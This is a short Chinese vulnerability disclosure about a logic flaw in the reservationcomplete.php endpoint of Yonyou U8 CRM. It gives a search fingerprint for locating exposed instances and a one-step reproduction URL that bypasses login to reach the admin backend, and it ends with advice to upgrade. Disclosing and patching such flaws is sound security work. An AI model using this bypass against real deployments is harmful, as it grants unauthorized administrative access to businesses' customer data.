用友CRM reservationcomplete.php逻辑漏洞登录后台

产品简介

用友CRM（Customer Relationship Management，客户关系管理）是由用友公司开发的一款软件，专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系，提升客户满意度，优化销售和服务流程，从而提高企业的市场竞争力。它适用于各种规模的企业，可以根据不同企业的具体需求进行定制和扩展。

资产测绘

title==“用友U8CRM”

漏洞概述

用友CRM系统在reservationcomplete.php接口处存在逻辑漏洞，攻击者可通过该漏洞直接进去后台，获取后台权限，为后续获取服务器权限做准备。

漏洞复现

访问url:/background/reservationcomplete.php?ID=1

访问后，直接访问主页进入后台

修复建议

升级至最新安全版本